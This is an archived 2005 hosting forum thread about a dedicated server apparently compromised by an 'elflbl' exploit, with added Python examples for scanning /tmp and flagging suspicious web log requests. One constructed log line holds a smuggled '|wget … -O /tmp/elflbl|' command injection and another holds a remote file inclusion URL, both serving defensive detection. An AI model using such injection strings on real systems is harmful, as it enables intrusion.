Thread: suspicious files on server
-
06-25-2005, 02:04 AM #1 Junior Guru Wannabe
Recently my dedicated server went down and I had to reboot it to get it back online.
I asked the server admin people to check the reason for it and they said:
We have found files on your machine that appear to be owned by 'root' which is a sign of compromise. We highly recommend you submit an OS Reload request to further correct the issue, as there might be misleading processes running that are malicious in nature.
root@jearaide [/tmp]# ll |egrep -v 'horde|impatt|core|cpanel|mysql|theme|iroha|sess|305|mt-throttle|jd|exim|lost'
total 17020
drwxrwxrwt 5 root root 65536 Jun 24 23:42 ./
drwxr-xr-x 23 root root 4096 Jun 3 13:46 ../
---------- 1 root root 1623 Jun 6 22:01 back
drwx------ 2 root root 4096 Jun 23 17:47 clamav-partial/
---------- 1 root root 28402 Jan 17 21:30 elflbl
---------- 1 root root 5208 Jun 6 21:58 ex
---------- 1 root root 28528 Jun 3 21:30 root
=============
Now an OS reload will cause all data to be lost and I don't have any backup either...
Can you suggest a way to solve this problem without an OS reload?
Or, if you think an OS reload is necessary, then what should I do and how?
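The two things that stand out in the /tmp listing are regular files owned by root with no permission bits at all (the `----------` entries) and the fact that they sit in a world-writable temp directory. The following is an added example, not from this thread, of a small scan that reports files matching those two signs; it builds a constructed sample directory for demonstration and is not a substitute for a rootkit scanner or an OS reload.

```python
import os
import stat
import tempfile


def suspect_files(directory, owner_uid=0):
    """Return (name, mode, size, reasons) for regular files in `directory` that show
    either sign from the listing: owned by `owner_uid` (root by default) with mode
    000, or carrying an execute bit, which a plain temp file should not have."""
    found = []
    with os.scandir(directory) as entries:
        for entry in sorted(entries, key=lambda e: e.name):
            st = entry.stat(follow_symlinks=False)
            if not stat.S_ISREG(st.st_mode):
                continue  # skip directories, symlinks, sockets
            perm = stat.S_IMODE(st.st_mode)
            reasons = []
            if st.st_uid == owner_uid and perm == 0:
                reasons.append("owned by uid %d with mode 000" % owner_uid)
            if perm & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
                reasons.append("executable")
            if reasons:
                found.append((entry.name, "%04o" % perm, st.st_size, reasons))
    return found


def scan_sample():
    """Build a constructed temp directory (names borrowed from the listing above,
    contents are dummy text) and scan it as the current user, since a demo
    cannot create root-owned files."""
    d = tempfile.mkdtemp(prefix="tmpscan-")
    for name, mode in (("back", 0o000), ("ok.txt", 0o644), ("ex", 0o755)):
        path = os.path.join(d, name)
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
        os.chmod(path, mode)
    return suspect_files(d, owner_uid=os.getuid())


if __name__ == "__main__":
    for name, mode, size, reasons in scan_sample():
        print("%-10s mode %s size %5d  %s" % (name, mode, size, "; ".join(reasons)))
```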
-
06-25-2005, 09:21 AM #2 Junior Guru Wannabe
elflbl is a known exploit and probably your box was compromised. There are tools to find some rootkits but not all.
Also, check your logs to see how that file got there. You might have a vulnerable script.
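Checking the web server logs for how a file landed in /tmp usually means looking for requests that hand a vulnerable script a remote URL or a shell command that fetches something into /tmp. This added example (not from this thread) parses a few constructed Apache combined-format log lines and flags those request patterns; the IPs, paths and file names are made up for the demo.

```python
import re
from urllib.parse import unquote

# Constructed sample access log lines (Apache "combined" format), not real traffic.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [24/Jun/2005:23:41:58 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.7 - - [24/Jun/2005:23:42:01 +0000] "GET /index.php?page=http://198.51.100.9/ex.txt? HTTP/1.1" 200 811 "-" "Mozilla/4.0"
198.51.100.23 - - [24/Jun/2005:23:42:09 +0000] "GET /cgi-bin/script.cgi?file=%7Cwget%20http%3A%2F%2F198.51.100.9%2Felflbl%20-O%20%2Ftmp%2Felflbl%7C HTTP/1.1" 200 311 "-" "lwp"
203.0.113.8 - - [24/Jun/2005:23:45:00 +0000] "POST /horde/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request path and status code from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Each indicator is checked against the URL-decoded request path.
INDICATORS = [
    ("remote URL passed as a parameter", re.compile(r'[?&][^=&]+=(?:https?|ftp)://', re.I)),
    ("fetch tool in request", re.compile(r'\b(?:wget|curl|fetch|lynx)\b', re.I)),
    ("write into /tmp", re.compile(r'/tmp/')),
    ("shell metacharacter in request", re.compile(r'[;|`]')),
]


def scan_access_log(text):
    """Return one dict per log line that matches at least one indicator."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a real scan would count these
        decoded = unquote(m.group("path"))
        reasons = [name for name, rx in INDICATORS if rx.search(decoded)]
        if reasons:
            hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                         "status": int(m.group("status")),
                         "request": decoded, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for h in scan_access_log(SAMPLE_ACCESS_LOG):
        print(h["time"], h["ip"], h["status"], h["request"], "->", ", ".join(h["reasons"]))
```

A 200 status on a flagged request is the line to chase first, since it means the script accepted the input.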
-
06-25-2005, 09:59 AM #3 Junior Guru Wannabe
I checked with chkrootkit but it didn't detect any file as suspicious??
Can you help me please...
Where is the log file located on the server through which I can check where that suspicious file came from?
-
06-25-2005, 10:26 AM #4 Eternal Member
Do you have a second hard disk on the server? Back up all accounts to that and restore them after the OS Reload. Then, find any outdated scripts and update them. Is your provider fully managed (including server hardening)? If not, get a server admin to lock it down for you.
Thanks,
MediaLayer, LLC - www.medialayer.com Learn how we can make your website load faster, translating to better conversion rates for your business!
The pioneers of optimized web hosting, featuring LiteSpeed Web Server & SSD Storage - Celebrating 10 Years in Business
-
06-25-2005, 10:46 AM #5 Junior Guru Wannabe
Yes, I have a second hard disk on the server...
Can you tell me which folders I should back up to it and how??
Also, tell me: if I am going to get an OS reload, how long will my server be offline??
And in that case, do I again need to do the settings in WHM and install Fantastico and everything, as I did when I got the fresh server??
Your help is appreciated.
-
06-25-2005, 11:13 AM #6 Eternal Member
Sorry, but I don't really have time to help further. You shouldn't even need to post here if you had your own server admin.
Thanks,
-
06-25-2005, 11:23 AM #7 Web Hosting Master
Hosting Champ:
Install and run Rootkit Hunter from http://www.rootkit.nl/projects/rootkit_hunter.html
-
06-25-2005, 06:31 PM #8 Junior Guru
Quote: "Also, tell me: if I am going to get an OS reload, how long will my server be offline??"
You really sound like you need to hire an experienced admin! After the reload, your server needs to be locked down IMMEDIATELY or else it may be compromised again in a short time.
Better to do it right, rather than lose your business due to repeated server outages!
-
06-25-2005, 07:05 PM #9
Quote: "You really sound like you need to hire an experienced admin! After the reload, your server needs to be locked down IMMEDIATELY or else it may be compromised again in a short time."
Firstly, security isn't about one time and it's done. Hacks appear daily, and unless you know 100% of what you're doing, you not only need to have your server secured once, but you need to have that admin keep an eye on the server to see what the problems are and could be.
Secondly, it's possible (not likely, but possible) that you don't need an OS reload. Again, without having an experienced admin look at your server, you'll never know.
The first step you must take, as others have said, is to find a server admin. Without that, you run a lot more risk of being simply shut down than with one. Make SURE you ask the right questions of them, as in what they do, etc., and how certain things will be covered, because many "server admins" out there simply run root checks and assume your server is secure. That's nowhere near complete.
Tom Whiting, WHMCS Guru extraordinaire
Linux problems? WHMCS Problems? Give me a shout
Check out my WHMCS Addons
-
06-25-2005, 08:34 PM #10 Web Hosting Master
Greetings:
chkrootkit and rkhunter only check for rootkits; they do not catch other forms of hacking.
Thank you.